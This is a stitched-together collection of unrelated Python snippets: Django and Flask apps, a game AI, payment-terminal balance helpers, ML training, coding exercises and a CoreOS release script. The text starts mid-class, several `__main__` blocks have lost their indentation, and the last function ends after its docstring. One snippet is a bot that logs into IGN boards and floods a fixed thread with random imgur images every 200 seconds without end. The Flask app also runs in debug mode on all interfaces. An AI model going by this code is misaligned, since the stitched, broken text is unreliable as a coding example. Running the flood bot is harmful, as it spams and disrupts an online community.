    """CRUD API endpoint for shopping-cart users; list/retrieve/create/
    update/destroy are all provided by ModelViewSet."""
    queryset = shoppingcartuser.objects.all()
    serializer_class = shoppingcartuserSerializer
from django.urls import path
from . import views
# Single route: architecture-evaluation requests go to the class-based view.
urlpatterns = [
    path('evaluate-architecture', views.EvaluateArchitecture.as_view()),
]
|
class AIController():
    """Base class for AI controllers.

    Concrete AIs override determine_next_moves() (and, where relevant,
    delete_entities()) to drive one or more entities in the mission.
    """

    def __init__ (self, mission_model, entity_id):
        """Store the mission model and remember which entity to control."""
        self.mission_model = mission_model
        self._init_entities(entity_id)
        self.next_moves_by_entity_id = {}

    def _init_entities(self, entity_id):
        """Record the controlled entity id; subclasses may override."""
        self.entity_id = entity_id

    def determine_next_moves(self):
        """Compute and cache the next move per controlled entity (no-op here)."""
        pass

    def get_next_moves(self):
        """Return the cached mapping of entity id -> next move."""
        return self.next_moves_by_entity_id

    def clear_all_ai_moves(self):
        """Forget all cached moves."""
        self.next_moves_by_entity_id = {}

    def delete_entities(self, entity_ids_to_delete):
        """Stop controlling the given entities (no-op here)."""
        pass
class AlwaysWait(AIController):
    """AI will always wait.
    """
    def determine_next_moves(self):
        # 'W' = wait; recorded for the single controlled entity.
        self.next_moves_by_entity_id[self.entity_id] = 'W'
class ChaseTheFox(AIController):
    """AI that moves each controlled entity one step closer to the fox.
    """
    def _init_entities(self, entity_id):
        """Internal method to set the internal entity ids.

        Accepts either a single entity id string or a list of ids.
        """
        # `basestring` only exists on Python 2; fall back to `str` so the
        # isinstance check also works on Python 3.
        try:
            string_types = basestring
        except NameError:
            string_types = str
        # If entity_ids is a single item, put it in a list
        if isinstance(entity_id, string_types):
            entity_id = [entity_id]
        self.entity_ids = entity_id
    def determine_next_moves(self):
        """Pick, for every controlled entity, the 8-way step that closes the
        gap to the fox ('W' when already on the fox's tile)."""
        # Clear out previous round's instructions
        self.next_moves_by_entity_id = {}
        # Because you can move in eight directions, move towards the fox.
        fox_entity = self.mission_model.all_entities_by_id['fox']
        # Get the fox's position
        fox_position_x = fox_entity.position_x
        fox_position_y = fox_entity.position_y
        # For each entity
        for entity_id in self.entity_ids:
            entity = self.mission_model.all_entities_by_id[entity_id]
            # Get the entity's position
            entity_position_x = entity.position_x
            entity_position_y = entity.position_y
            entity_direction_x = ""
            entity_direction_y = ""
            # Move towards the fox
            if fox_position_x < entity_position_x:
                entity_direction_x = 'L'
            elif fox_position_x > entity_position_x:
                entity_direction_x = 'R'
            if fox_position_y < entity_position_y:
                entity_direction_y = 'D'
            elif fox_position_y > entity_position_y:
                entity_direction_y = 'U'
            final_direction = entity_direction_y + entity_direction_x
            if final_direction == "":
                final_direction = 'W'
            # Store this result for later.
            self.next_moves_by_entity_id[entity_id] = final_direction
    def delete_entities(self, entity_ids_to_delete):
        """Remove the given entities from consideration."""
        for id in entity_ids_to_delete:
            self.entity_ids.remove(id)
class ManualInstructions(AIController):
    """AI that executes an externally supplied instruction, one per turn."""

    def __init__(self, *args, **kwargs):
        """Start with no pending instruction."""
        AIController.__init__(self, *args, **kwargs)
        self.next_instruction = None

    def add_instruction(self, instruction):
        """Queue *instruction* to be consumed on the next turn."""
        self.next_instruction = instruction

    def determine_next_moves(self):
        """Consume the pending instruction, defaulting to wait ('W')."""
        move = 'W'
        if self.next_instruction:
            move = self.next_instruction
            self.next_instruction = None
        self.next_moves_by_entity_id[self.entity_id] = move
class ReplayInstructions(AIController):
    """AI that replays a queued list of instructions, one per turn."""

    def __init__(self, *args, **kwargs):
        """Start with an empty instruction queue."""
        AIController.__init__(self, *args, **kwargs)
        self.next_instructions = []

    def add_instructions(self, instructions):
        """Append *instructions* to the pending queue."""
        self.next_instructions += instructions

    def determine_next_moves(self):
        """Pop and store the next queued instruction; wait ('W') if empty."""
        move = self.next_instructions.pop(0) if self.next_instructions else 'W'
        self.next_moves_by_entity_id[self.entity_id] = move
|
# -*- coding: utf-8 -*-
import time
from datetime import datetime, timedelta
from collections import defaultdict
from decimal import Decimal
from django.db import transaction
from django.db.models import Sum
from . import models
def get_token_code():
    """Return the newest enabled SDB token string, or None if there is none."""
    obj = models.SDBToken.objects.filter(is_disabled=False).order_by("-create_time").first()
    return obj.token if obj else None
def disable_token(token):
    """Mark every SDBToken row matching *token* as disabled.

    Saves row-by-row rather than queryset.update() — NOTE(review):
    presumably to run model save hooks; confirm before optimizing.
    """
    objs = models.SDBToken.objects.filter(token=token)
    for obj in objs:
        obj.is_disabled = True
        obj.save()
def add_token(token):
    """Persist a new SDBToken row for *token* and return it."""
    obj = models.SDBToken.objects.create(token=token)
    return obj
def del_token():
    """Delete all tokens created more than one day ago."""
    # `now` is actually the cutoff timestamp (current time minus 1 day).
    now = datetime.now() - timedelta(1)
    objs = models.SDBToken.objects.filter(create_time__lt=now)
    objs.delete()
def add_user_terminals(user, start, end):
    """Bind every known terminal in the inclusive range [start, end] to
    *user*, skipping terminals the user already has.  The range endpoints
    may be given in either order."""
    used_tids = {pos.terminal for pos in models.SDBPos.objects.filter(user=user)}
    lo, hi = min(start, end), max(start, end)
    candidate_tids = list(set(range(lo, hi + 1)) - used_tids)
    new_rows = [
        models.SDBPos(terminal=terminal_obj.terminal, user=user)
        for terminal_obj in models.SDBTerminal.objects.filter(terminal__in=candidate_tids)
    ]
    if new_rows:
        models.SDBPos.objects.bulk_create(new_rows)
def add_user_terminals_agent(user, agent):
    """Bind all of *agent*'s terminals to *user*, skipping any terminal the
    user already has."""
    used_tids = {pos.terminal for pos in models.SDBPos.objects.filter(user=user)}
    new_rows = [
        models.SDBPos(terminal=terminal_obj.terminal, user=user)
        for terminal_obj in models.SDBTerminal.objects.filter(agent=agent)
        if terminal_obj.terminal not in used_tids
    ]
    if new_rows:
        models.SDBPos.objects.bulk_create(new_rows)
def get_user_by_terminal(terminal):
    """
    Return the user bound to the given terminal number, or None.

    NOTE(review): the broad except treats any failure (no SDBPos row, or
    unexpectedly multiple rows) as "no user" — confirm this best-effort
    behaviour is intended before narrowing it.
    """
    try:
        obj = models.SDBPos.objects.get(terminal=terminal)
        user = obj.user
    except Exception:
        user = None
    return user
# --- SDBUserRMB balance operations ----------------------------------------
# All balances live on a single SDBUserRMB row per user.  Every operation
# locks that row (select_for_update inside a transaction) before reading or
# writing it, so concurrent adjustments cannot lose updates.  The original
# 18 near-identical functions are kept as thin wrappers over three helpers.

def _locked_userrmb(user):
    """Fetch (or create) the user's SDBUserRMB row with a row lock held.

    Must be called inside transaction.atomic(); the lock is released when
    the surrounding transaction commits.
    """
    obj, _created = models.SDBUserRMB.objects.select_for_update().get_or_create(
        user=user, defaults={"rmb": 0})
    return obj

def _adjust_field(user, field, delta):
    """Atomically add *delta* (may be negative) to *field* on the user's row."""
    with transaction.atomic():
        obj = _locked_userrmb(user)
        setattr(obj, field, getattr(obj, field) + delta)
        obj.save()

def _read_field(user, field):
    """Atomically read *field* from the user's row (creating it if absent)."""
    with transaction.atomic():
        return getattr(_locked_userrmb(user), field)

# rmb operation
def add_sdbuserrmb_rmb(user, rmb):
    _adjust_field(user, "rmb", rmb)
def sub_sdbuserrmb_rmb(user, rmb):
    _adjust_field(user, "rmb", -rmb)
def get_sdbuserrmb_num(user):
    return _read_field(user, "rmb")
# child_rmb operation
def add_sdbuserrmb_child_rmb(user, rmb):
    _adjust_field(user, "child_rmb", rmb)
def sub_sdbuserrmb_child_rmb(user, rmb):
    _adjust_field(user, "child_rmb", -rmb)
def get_sdbuserrmb_child_num(user):
    return _read_field(user, "child_rmb")
# child_rmb two operation
def add_sdbuserrmb_child_two_rmb(user, rmb):
    _adjust_field(user, "child_two_rmb", rmb)
def sub_sdbuserrmb_child_two_rmb(user, rmb):
    _adjust_field(user, "child_two_rmb", -rmb)
def get_sdbuserrmb_child_two_num(user):
    return _read_field(user, "child_two_rmb")
# child_rmb three operation
def add_sdbuserrmb_child_three_rmb(user, rmb):
    _adjust_field(user, "child_three_rmb", rmb)
def sub_sdbuserrmb_child_three_rmb(user, rmb):
    _adjust_field(user, "child_three_rmb", -rmb)
def get_sdbuserrmb_child_three_num(user):
    return _read_field(user, "child_three_rmb")
# fanxian rmb
def add_sdbuserrmb_fanxian_rmb(user, rmb):
    _adjust_field(user, "fanxian_rmb", rmb)
def sub_sdbuserrmb_fanxian_rmb(user, rmb):
    _adjust_field(user, "fanxian_rmb", -rmb)
def get_sdbuserrmb_fanxian_num(user):
    return _read_field(user, "fanxian_rmb")
# fanxian child rmb
def add_sdbuserrmb_fanxian_child_rmb(user, rmb):
    _adjust_field(user, "fanxian_child_rmb", rmb)
def sub_sdbuserrmb_fanxian_child_rmb(user, rmb):
    _adjust_field(user, "fanxian_child_rmb", -rmb)
def get_sdbuserrmb_fanxian_child_num(user):
    return _read_field(user, "fanxian_child_rmb")
# pos
def get_sdb_pos(user):
    """Return the list of terminal numbers bound to *user*."""
    poses = models.SDBPos.objects.filter(user=user).values_list("terminal", flat=True)
    return list(poses)
def get_sdb_pos_objs(user):
    """Return the SDBTerminal rows for all of *user*'s terminals."""
    poses = get_sdb_pos(user)
    objs = models.SDBTerminal.objects.filter(terminal__in=poses)
    return objs
def get_pos_jihuo_num(poses):
    """Count how many of the given terminals have activated status (已激活)."""
    num = models.SDBTerminal.objects.filter(terminal__in=poses).filter(activate_status=u"已激活").count()
    return num
# trade
def get_latest_trade(poses):
    """Return up to the 100 most recent successful trades for the terminals.

    Keeps credit-card (贷记卡) swipe/QuickPass non-VIP trades plus test
    swipes (试刷), all restricted to success return code "00".
    """
    qs = models.SDBTrade.objects.filter(terminal__in=poses).filter(return_code="00")
    objs_01 = qs.filter(card_type=u"贷记卡").filter(trade_type__in=[u"刷卡支付收款", u"云闪付支付收款"]).filter(business_type=u"非VIP交易")
    objs_02 = qs.filter(trade_type=u"试刷")
    objs = objs_01 | objs_02
    objs = objs.order_by("-trade_date")[:100]
    return objs
# fenrun
def get_sdb_fenrun(user):
    """Return the user's SDBFenRun record, or None if none exists."""
    return models.SDBFenRun.objects.filter(user=user).first()
|
# coding: utf-8
import numpy as np
from .base import NeighborsBasedMethod
class NearestNeighbor(NeighborsBasedMethod):
    '''Predict a node's area from its nearest labeled neighbor.

    Oracle variant: it already knows the node's own true location and picks
    the friend whose area is closest to it.
    O(number of nodes x average number of edges).
    '''
    # Column names for the tuple returned by select().
    header = ['area_id', 'degree', 'labeled_degree', 'distance']
    def __init__(self, network, distfunc):
        # distfunc(u, v) -> distance between two area labels.
        super().__init__(network)
        self.distfunc = distfunc
    def select(self, node, locations):
        '''
        Args:
            node: the node whose area is being predicted.
            locations: area labels of the node's friends (falsy = unlabeled).
        Returns:
            (area_id, number of friends, number of labeled friends,
            min_distance); area_id 0 and distance None when no prediction
            can be made.
        '''
        num_friends = len(locations)
        friends_areas = [l for l in locations if l]
        nlabels = len(friends_areas)
        # Own location unknown: cannot measure any distance.
        if node not in self._labels:
            return (0, num_friends, nlabels, None)
        # Own (true) location is known.
        u = self._labels[node]
        # No labeled friends to compare against.
        if not nlabels:
            return (0, num_friends, nlabels, None)
        dists = [self.distfunc(u, v) for v in friends_areas]
        idx = np.argmin(dists, axis=0)
        return friends_areas[idx], num_friends, nlabels, dists[idx]
|
import webbrowser
# import requests
# #webbrowser.open('http://inventwithpython.com/')
#
# res = requests.get('http://www.teachinginsanity.net/APUSH/Unit%2001/Henretta%20Chapter%202.pdf')
# print(type(res))
# res.raise_for_status()
# file = open('APUSH2.txt', 'wb')
# for chunk in res.iter_content(100000):
# file.write(chunk)
# file.close()
import urllib2
def main():
    # Fetch one specific chapter-outline page and save it locally.
    download_file("http://bcs.bedfordstmartins.com/webpub/Ektron/Henretta_Americas%20History_7e/ch_outline_html/Henretta%207%20OSG%20Ch%201%20Chapter%20Outline_Final.htm")
def download_file(download_url):
    """Download *download_url* and save the body to chapter1.txt.

    Both the HTTP response and the output file are now closed even if an
    error occurs mid-transfer (the original leaked both on failure).
    """
    response = urllib2.urlopen(download_url)
    try:
        # `with` guarantees the file is flushed and closed on error paths.
        with open("chapter1.txt", 'w') as out_file:
            out_file.write(response.read())
    finally:
        response.close()
    print("Completed")
# Run the download only when executed as a script.
if __name__ == "__main__":
    main()
import tkinter
# Minimal Tk demo: a window with a multi-line Text widget.
main = tkinter.Tk()
myText = tkinter.Text(main)
myText.pack()
# Insert content into the text box; \r\n is a line break.
myText.insert(tkinter.INSERT, '这是一段内容,会显示在文本框里\r\n')
myText.insert(tkinter.INSERT, '这是一段内容,会显示在文本框里\r\n')
myText.insert(tkinter.INSERT, '这是一段内容,会显示在文本框里\r\n')
main.mainloop()
### Estrutura condicional -- simples quando não tem o ''else'' composta quando o tem
'''
if carro.esquerda():
bloco true
else:
bloco false
'''
### condição composta
'''
tempo = int(input('Quantos anos tem seu carro? '))
if tempo <=3:
print('Carro novo')
else:
print('Carro velho')
print('---FIM---')
'''
### condição simplificada
'''
tempo = int(input('Quantos anos tem seu carro? '))
print('Carro novo' if tempo <=3 else 'Carro velho')
print('---FIM---')
'''
###Brincando
### Condição composta
'''
nome = str(input('Qual e o seu nome? ')).strip().capitalize()
if nome == 'Jean':
print('Que nome lindo vc tem!')
else:
print('Seu nome é tão normal!')
print('Bom dia, {}!'.format(nome))
'''
### Condição composta
'''
n1 = float(input('Digite a primeira nota: '))
n2 = float(input('Digite a segunda nota: '))
m = (n1 + n2)/2
print('Sua média foi {:.1f}'.format(m))
if m >= 6.0:
print('Você foi aprovado, PARABÊNS!')
else:
print('Você foi reprovado, estude mais da proxima vez!')
'''
### Condição simplificada
'''
n1 = float(input('Digite a primeira nota: '))
n2 = float(input('Digite a segunda nota: '))
m = (n1 + n2)/2
print('Sua média foi {:.1f}'.format(m))
print('PARABÊNS!' if m >= 6 else 'Estude mais!')
'''
|
""" server.py """
from flask import Flask, request, jsonify, render_template, redirect
from pymongo import MongoClient
import json
MONGODB_HOST = 'localhost'
MONGODB_PORT = 27017
app = Flask(__name__)
# from_object(__name__) copies this module's UPPERCASE names (MONGODB_HOST,
# MONGODB_PORT) into app.config, which is how they are read back below.
app.config.from_object(__name__)
app.config['MONGO_DBNAME'] = "mainAPP"
#connection = MongoClient('localhost', 27017)
connection = MongoClient(app.config['MONGODB_HOST'], app.config['MONGODB_PORT'])
@app.route('/')
def index():
    # BUG(review): this view returns None ('pass'), so Flask raises
    # "view function did not return a valid response" on every request
    # to '/'.  Presumably it should render a homepage or redirect to
    # /login or /users/ — confirm the intended page before fixing.
    pass
@app.route('/login')
def login():
    """Serve the static login page."""
    template_name = "login.html"
    return render_template(template_name)
@app.route('/users/', methods=['GET'])
def show_users():
    """List every registered user (username, email, skills) on index.html."""
    db = connection['mainAPP']
    records = [
        {
            'username': str(doc['username']),
            'email': str(doc['email']),
            'skills': doc['skills'],
        }
        for doc in db.users.find()
    ]
    return render_template("index.html", existingUsers=json.dumps(records))
@app.route('/<username>')
def show_users_stuff(username):
    """Render the profile page for *username*, or a plain not-found message."""
    db = connection['mainAPP']
    doc = db.users.find_one({"username": str(username)})
    app.logger.info(doc)
    if not doc:
        return "not found!"
    profile = {
        'username': str(username),
        'email': str(doc['email']),
        'skills': doc['skills'],
    }
    return render_template("user.html", existingUser=json.dumps(profile))
@app.route('/<username>/add_skill', methods=['GET', 'POST'])
def add_user_skill(username):
    """Append the POSTed JSON skill object to *username*'s skill list.

    GET requests and unknown usernames fall through and return the same
    placeholder body without modifying anything (original behavior).
    """
    db = connection['mainAPP']
    collection = db.users
    user = collection.find_one({"username": str(username)})
    if user and request.method == 'POST':
        user[u'skills'].append(request.json)
        # update_one replaces Collection.update(), which was removed in
        # PyMongo 4; semantics for a single-document $set are identical.
        collection.update_one({"username": str(username)}, {"$set": user}, upsert=False)
    return "aa"
@app.route('/<username>/remove_skill', methods=['GET', 'POST'])
def remove_user_skill(username):
    """Remove the skill whose name matches the raw POST body.

    NOTE(review): under Python 3 ``request.data`` is bytes while the
    skill keys are str — confirm what type the client actually sends.
    """
    db = connection['mainAPP']
    collection = db.users
    user = collection.find_one({"username": str(username)})
    if user and request.method == 'POST':
        # Iterate over a copy: the original removed elements from the
        # list it was iterating, which skips the element after a match.
        for skill in list(user[u'skills']):
            # next(iter(...)) gets the first key on both Python 2 and 3;
            # the original dict.keys()[0] is Python-2 only.
            if next(iter(skill)) == request.data:
                user[u'skills'].remove(skill)
        # update_one replaces the removed-in-PyMongo-4 Collection.update().
        collection.update_one({"username": str(username)}, {"$set": user}, upsert=False)
    return "aa"
@app.route('/<username>/add_todo', methods=['GET', 'POST'])
def add_skill_todo(username):
    """Append newTodo to the todo list of the skill named skill_in_use."""
    db = connection['mainAPP']
    collection = db.users
    user = collection.find_one({"username": str(username)})
    if user and request.method == 'POST':
        skill_in_use = request.json['skill_in_use']
        new_todo = request.json['newTodo']
        for skill in user[u'skills']:
            # next(iter(...)) replaces the Python-2-only dict.keys()[0].
            if next(iter(skill)) == skill_in_use:
                # 'skill' is the very dict held by user['skills'], so the
                # original's .index(skill) round-trip was redundant.
                skill[skill_in_use].append(new_todo)
        # update_one replaces the removed-in-PyMongo-4 Collection.update().
        collection.update_one({"username": str(username)}, {"$set": user}, upsert=False)
    return "aa"
@app.route('/<username>/remove_todo', methods=['GET', 'POST'])
def remove_skill_todo(username):
    """Remove 'Todo' from the todo list of the skill named skill_in_use.

    As in the original, list.remove raises ValueError if the todo is not
    present — surfaced as a 500; confirm whether that is acceptable.
    """
    db = connection['mainAPP']
    collection = db.users
    user = collection.find_one({"username": str(username)})
    if user and request.method == 'POST':
        skill_in_use = request.json['skill_in_use']
        todo = request.json['Todo']
        for skill in user[u'skills']:
            # next(iter(...)) replaces the Python-2-only dict.keys()[0].
            if next(iter(skill)) == skill_in_use:
                skill[skill_in_use].remove(todo)
        app.logger.info(user[u'skills'])
        # update_one replaces the removed-in-PyMongo-4 Collection.update().
        collection.update_one({"username": str(username)}, {"$set": user}, upsert=False)
    return "aa"
#@app.route('/add/<username>', methods=['GET'])
#def add_user(username):
# db = connection['mainAPP']
# collection = db.users
# r = collection.find_one({'username': username})
# if r is None:
# user = {'username': username,
# 'email': u'root@localhost',
# 'skills': [{'skill_name1': ['todo1', 'todo2']}, {'skill_name2': ['todo3', 'todo4']}]}
#
# collection.insert(user)
# return "inserted"
# else:
# return "skipped because user exists!"
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000, debug=True) |
import tensorflow as tf
import numpy as np
import optimizer as om
import dataset as ds
import matplotlib.pyplot as plt
from PIL import Image as pi
import model
import time
import os
EPOCH_NUM = 500
def main():
    """Train the MNIST model, logging loss to TensorBoard and
    periodically checkpointing to ./model_trained/.

    Stops (and saves a final checkpoint) when the optimizer wrapper
    signals convergence by returning None from update().
    """
    print('Loading MNIST dataset...')
    mnist = ds.Dataset()
    mnist.load(ds.MNIST, '../MNIST/')
    model_save_dir = './model_trained/'
    train_log_dir = './train_log/'
    if not os.path.exists(model_save_dir):
        os.mkdir(model_save_dir)
    if not os.path.exists(train_log_dir):
        os.mkdir(train_log_dir)
    batch_size = 3
    mnist.set_batch_size(batch_size)
    t_x, t_labels, t_gt_labels, t_err = model.mnist_model(mnist.shape_of_sample(), [16,32,16], mnist.shape_of_label())
    batch_num = int(EPOCH_NUM * len(mnist.train_samples)/batch_size)
    # create an optimizer for training
    opt = om.Optimizer()
    minimizer = opt.minimize(t_err)
    sess = tf.Session()
    saver = tf.train.Saver()
    sess.run(tf.global_variables_initializer())
    tf.summary.scalar('loss', t_err)
    merge_summary = tf.summary.merge_all()
    # BUG FIX: original read "FileWriter(train_log_dir,s ess.graph)" —
    # a syntax error; the intended argument is sess.graph.
    train_writer = tf.summary.FileWriter(train_log_dir, sess.graph)

    def _checkpoint_path():
        # Timestamped checkpoint name, e.g. "Y2020m01d05H12M30S59".
        return os.path.join(
            model_save_dir,
            time.strftime('Y%Ym%md%dH%HM%MS%S',
                          time.localtime(int(time.time()))))

    for i in xrange(batch_num):
        x, gt_labels = mnist.train_batch()
        err, _, summary = sess.run([t_err, minimizer, merge_summary],
                feed_dict={t_x: x, t_gt_labels: gt_labels.astype(np.int32)})
        minimizer = opt.update(sess, err)
        if i % 100 == 0:
            print('batch=%d epoch=%d err=%.6f'%(i,int(i*batch_size/len(mnist.train_samples)), err))
            train_writer.add_summary(summary, int(i/100))
        # opt.update() returning None signals training is done.
        if minimizer is None:
            model_path = _checkpoint_path()
            print('final model saved to %s'%model_path)
            saver.save(sess, model_path)
            exit(0)
        else:
            if i % 10000 == 0:
                model_path = _checkpoint_path()
                print('saving model to %s'%model_path)
                saver.save(sess, model_path)
    '''
    x,y = mnist.test()
    rand_id = np.random.randint(len(x))
    plt.imshow(x[rand_id].reshape([x.shape[1], x.shape[2]]))
    plt.show()
    print(str(y[rand_id]))
    '''
main()
|
# https://atcoder.jp/contests/abc233/tasks/abc233_b
# # def input(): return sys.stdin.readline().rstrip()
# # input = sys.stdin.readline
# from numba import njit
# from functools import lru_cache
# import sys
# input = sys.stdin.buffer.readline
# sys.setrecursionlimit(10 ** 7)
L, R = map(int, input().split())
S = input()
# Reverse the 1-indexed substring [L, R] and stitch the pieces together.
prefix, middle, suffix = S[:L - 1], S[L - 1:R], S[R:]
print(prefix + middle[::-1] + suffix)
# S = input()
# n = int(input())
# N, K = map(int, input().split())
# l = list(map(int, (input().split())))
# A = [[int(i) for i in input().split()] for _ in range(N)]
# import sys
# it = map(int, sys.stdin.buffer.read().split())
# N = next(it)
# @njit('(i8,i8[::1],i4[::1])', cache=True)
# def main():
# @lru_cache(None)
# def dfs():
# return
# return
# main()
|
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import cross_val_score
from data import X, y
from train import rf, xgb, gb, et, sv
# shuffle=True is required when random_state is set: recent scikit-learn
# versions raise "Setting a random_state has no effect since shuffle is
# False" for the original call.
kfold = StratifiedKFold(n_splits=3, shuffle=True, random_state=17)
rf_results = cross_val_score(rf, X, y, cv=kfold, n_jobs=4)
xgb_results = cross_val_score(xgb, X, y, cv=kfold, n_jobs=4)
gb_results = cross_val_score(gb, X, y, cv=kfold, n_jobs=4)
et_results = cross_val_score(et, X, y, cv=kfold, n_jobs=4)
sv_results = cross_val_score(sv, X, y, cv=kfold, n_jobs=4)
# Label each line with its model so the five scores are distinguishable
# (matches the "RF Accuracy: ..." format recorded in the notes below).
for label, scores in (("RF", rf_results), ("XGB", xgb_results),
                      ("GB", gb_results), ("ET", et_results),
                      ("SV", sv_results)):
    print("%s Accuracy: %.2f%% (%.2f%%)" % (label, scores.mean()*100, scores.std()*100))
# RF Accuracy: 94.52% (2.09%)
# XGB Accuracy: 96.35% (1.72%)
# GB Accuracy: 97.26% (1.00%)
# ET Accuracy: 90.12% (1.13%)
# SV Accuracy: 95.89% (1.13%)
# after hyperparameter tuning:
# RF Accuracy: 93.92% (2.06%)
# XGB Accuracy: 96.35% (1.72%)
# GB Accuracy: 96.96% (0.95%)
# ET Accuracy: 93.77% (1.13%)
# SV Accuracy: 98.93% (0.57%)
# after hyperparameter tuning rerun:
# RF Accuracy: 94.92% (0.17%)
# XGB Accuracy: 96.81% (1.16%)
# GB Accuracy: 96.57% (1.02%)
# ET Accuracy: 94.10% (0.45%)
# SV Accuracy: 98.11% (0.60%)
# Ensemble Accuracy: 97.83% (0.80%) |
"""
A, B and Modulo
Problem Description
Given two integers A and B, find the greatest possible positive M, such that A % M = B % M.
Problem Constraints
1 <= A, B <= 10^9
A != B
Input Format
The first argument given is the integer, A.
The second argument given is the integer, B.
Output Format
Return an integer denoting greatest possible positive M.
Example Input
Input 1:
A = 1
B = 2
Input 2:
A = 5
B = 10
Example Output
Output 1:
1
Output 2:
5
Example Explanation
Explanation 1:
1 is the largest value of M such that A % M == B % M.
Explanation 2:
For M = 5, A % M = 0 and B % M = 0.
No value greater than M = 5, satisfies the condition.
"""
class Solution:
    # @param A : integer
    # @param B : integer
    # @return an integer
    def solve(self, A, B):
        """Return the largest positive M with A % M == B % M.

        A % M == B % M exactly when M divides (A - B), so the greatest
        such M is |A - B| itself (positive because A != B).
        """
        difference = A - B
        return difference if difference >= 0 else -difference
from messy import Base
from sqlalchemy import Column, Integer, String, Boolean, DateTime, Text, ForeignKey
from sqlalchemy.orm import relationship
class Chatroom(Base):
    """A chat room; rows live in the 'chatrooms' table."""
    __tablename__ = 'chatrooms'
    id = Column(Integer, primary_key=True)
    title = Column(String(200))
    # Presumably the maximum member count — enforcement is not visible here; confirm.
    member_limit = Column(Integer)
    private = Column(Boolean)
    # NOTE(review): stored as String(200); nothing in this module hashes it —
    # confirm hashing happens before assignment.
    password = Column(String(200))
    type = Column(String(50))
    updated_at = Column(DateTime)
    created_at = Column(DateTime)
    # Presumably a soft-delete timestamp — confirm against the deletion code path.
    deleted_at = Column(DateTime)
    members = relationship("ChatroomMember")
    messages = relationship("ChatroomMessage")
class ChatroomMessage(Base):
    """A single message posted in a chat room ('chatroom_messages' table)."""
    __tablename__ = 'chatroom_messages'
    id = Column(Integer, primary_key=True)
    # Plain Integer with no ForeignKey, unlike chatroom_id below — confirm
    # whether a users-table FK was intended.
    user_id = Column(Integer)
    chatroom_id = Column(Integer, ForeignKey('chatrooms.id'))
    message = Column(Text)
    type = Column(String(50))
    updated_at = Column(DateTime)
    created_at = Column(DateTime)
|
import requests
from time import sleep
from igninterage import Igninterage
"""flood no tpc de imagens random"""
"""https://www.ignboards.com/threads/topico-das-imagens-randoms.455505695/"""
TOPICO = '455505695'
TEMPO = 200 # segundos
def gur():
    """Return the direct .jpg URL of a random imgur image.

    imgur's /random redirects to a gallery page; the gallery path is
    rewritten into a direct .jpg link and verified with a second request.
    Exactly one redirect in the verification means the link resolved
    directly; otherwise another random image is tried.
    """
    while True:
        r = requests.get('https://imgur.com/random', timeout=7)
        candidate = f"{r.url.replace('gallery/', '')}.jpg"
        # timeout added: the original second request could hang forever.
        check = requests.get(candidate, timeout=7)
        if len(check.history) == 1:
            return candidate
        # Loop instead of recursing: the original called gur() recursively
        # on every miss and could exhaust the stack on an unlucky streak.
def imgflood():
    """Log in to IGN boards and post a random imgur image to the topic
    every TEMPO seconds, forever."""
    ign = Igninterage('https://www.ignboards.com/')
    ign.ign_login()
    while True:
        try:
            image_url = gur()
            if not image_url:
                print('erro ao recuperar imagem, continuando...')
            else:
                ign.comentar(f'[img]{image_url}[/img]', TOPICO)
        except Exception as err1:
            print(f'Erro, ih rapaz: {err1}. Tentando novamente...')
        sleep(TEMPO)
if __name__ == '__main__':
#print(gur())
imgflood()
|
from django.apps import AppConfig
class EasyifscapiConfig(AppConfig):
    """Django application configuration for the 'easyifscapi' app."""
    name = 'easyifscapi'
|
'''
DESAFIO 041
Crie um programa que leia o ano de nascmento de um atleta.
e mostre sua categoria,de acordo com a idade:
- Até 9 anos: MIRIM - Até 25 anos: SÊnior
- Até 14 anos: INFANTIL - Acima: MASTER
- Até 19 anos: JUNIOR
'''
from datetime import date

# Athlete age-category classifier (Desafio 041): compute the age from the
# birth year, then map it onto the bracket table from the header docstring.
ano_atual = date.today().year
nasc = int(input('Ano de nascimento: '))
idade = ano_atual - nasc
print(f'Quem nasceu em {nasc} tem {idade} anos em {ano_atual}')
# Brackets are checked in ascending order, so each elif implies the
# previous bound was exceeded.  A single print replaces the five
# near-identical (and needlessly f-prefixed) print statements.
if idade <= 9:
    categoria = 'MIRIM'
elif idade <= 14:
    categoria = 'INFANTIL'
elif idade <= 19:
    categoria = 'JUNIOR'
elif idade <= 25:
    categoria = 'SÊNIOR'
else:
    categoria = 'MASTER'
print(f'Categoria: {categoria}.')
|
#!/usr/bin/env python3
# Convert a coreos-assembler build into a "release.json"
# Originally from https://github.com/coreos/fedora-coreos-releng-automation/blob/main/coreos-meta-translator/trans.py
# See also https://github.com/coreos/fedora-coreos-tracker/blob/main/Design.md#release-streams
from argparse import ArgumentParser
import json
import os
import requests
from cosalib.builds import Builds
FCOS_STREAM_ENDPOINT = "https://builds.coreos.fedoraproject.org/prod/streams"
def ensure_dup(inp, out, inp_key, out_key):
    '''
    If the out dictionary does not contain a value for out_key update it
    to be equal to the inp dictionaries inp_key value, if it does exist
    ensure the values are equal between the two dictionaries
    '''
    expected = inp.get(inp_key)
    if out_key not in out:
        out[out_key] = expected
        return
    current = out[out_key]
    if current != expected:
        raise Exception(f"Input Files do not appear to be for the same release ({current} != {expected})")
def url_builder(stream, version, arch, path):
    # Public download URL for one artifact.  Relies on the module-level
    # 'args' namespace (parsed below) for the stream base URL.
    return f"{args.stream_baseurl}/{stream}/builds/{version}/{arch}/{path}"
def get_extension(path, modifier, arch):
    """Return the artifact extension: the text after "<modifier>.<arch>."
    in *path*, e.g. "...-metal.x86_64.raw.xz" -> "raw.xz".

    (str.split and str.rsplit produce identical lists when no maxsplit is
    given, so index [1] selects the same piece as the original.)
    """
    marker = f'{modifier}.{arch}'
    remainder = path.split(marker)[1]
    return remainder[1:]  # drop the leading '.'
parser = ArgumentParser()
parser.add_argument("--workdir", help="cosa workdir")
parser.add_argument("--build-id", help="build id")
parser.add_argument("--distro", help="Distro selects stream defaults such as baseurl and format", choices=['fcos', 'rhcos'])
parser.add_argument("--stream-name", help="Override the stream ID (default is derived from coreos-assembler)")
parser.add_argument("--stream-baseurl", help="Override prefix URL for stream content", default=FCOS_STREAM_ENDPOINT)
parser.add_argument("--output", help="Output to file; default is build directory")
parser.add_argument("--url", help="URL to a coreos-assembler meta.json", default=[], action='append')
parser.add_argument("--no-signatures", help="Disable signature references", action='store_true')
args = parser.parse_args()
def gather_buildmeta_from_workdir():
    """Load meta.json for every architecture of one build in the cosa workdir.

    Uses the build id from --build-id (module-level 'args') when given,
    otherwise the latest build known to coreos-assembler.  Returns
    (base_builddir, parsed_builds) where parsed_builds holds one parsed
    meta.json dict per architecture.
    """
